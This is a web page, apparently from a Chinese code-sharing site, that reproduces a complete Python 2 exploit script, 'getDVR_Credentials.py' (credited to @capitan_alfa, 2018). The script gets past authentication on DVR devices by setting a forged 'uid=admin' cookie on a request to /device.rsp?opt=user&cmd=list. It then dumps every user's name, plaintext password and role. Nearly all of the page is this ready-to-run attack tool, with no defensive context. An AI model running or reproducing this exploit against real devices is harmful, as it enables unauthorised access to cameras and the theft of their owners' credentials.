扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 |
# -*- coding: utf-8 -*- import json import requests import argparse import tableprint as tp class Colors: BLUE= '\033[94m' GREEN = '\033[32m' RED = '\033[0;31m' DEFAULT = '\033[0m' ORANGE= '\033[33m' WHITE = '\033[97m' BOLD= '\033[1m' BR_COLOUR = '\033[1;37;40m' banner = ''' __..--.._ ......--~.....<code>. .":"</code>-....' ..-'":". <code> </code> <code>._ </code> _.'<code>"( </code>-"'<code>._ ' _.' ' ~~~</code>.~~~ .' / ( ^---' [*] @capitan_alfa ''' details = ''' # Exploit Title: DVRs; Credentials Exposed # Date:09/04/2018 # Exploit Author:Fernandez Ezequiel ( @capitan_alfa ) ''' parser = argparse.ArgumentParser(prog='getDVR_Credentials.py', description=' [+] Obtaining Exposed credentials', epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81', version="1.1") parser.add_argument('--host', dest="HOST",help='Host',required=True) parser.add_argument('--port', dest="PORT",help='Port',default=80) args= parser.parse_args() HST = args.HOST port= args.PORT headers = {} fullHost_1= "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list" host= "http://"+HST+":"+str(port)+"/" print Colors.GREEN+banner+Colors.DEFAULT def makeReqHeaders(xCookie): headers["Host"] =host headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)" headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3" headers["Connection"] = "close" headers["Content-Type"] = "text/html" headers["Cookie"] = "uid="+xCookie return headers try: rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000) except Exception,e: print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT exit() badJson = rX.text try: dataJson = json.loads(badJson) totUsr = len(dataJson["list"]) #--> 10 except Exception, e: print " [+] Error: "+str(e) print " [>] json: "+str(rX) #print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin")) exit() print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT print " " final_data = [] try: for obj in range(0,totUsr): temp = [] _usuario= dataJson["list"][obj]["uid"] _password = dataJson["list"][obj]["pwd"] _role = dataJson["list"][obj]["role"] temp.append(_usuario) temp.append(_password) temp.append(_role) final_data.append(temp) hdUsr= Colors.GREEN + "Username" + Colors.DEFAULT hdPass = Colors.GREEN + "Password" + Colors.DEFAULT hdRole = Colors.GREEN + "Role ID"+ Colors.DEFAULT cabeceras = [hdUsr, hdPass, hdRole] tp.table(final_data, cabeceras, width=20) except Exception, e: print "\n [!]: "+str(e) print " [+] "+ str(dataJson) print "\n" |
体验盒子
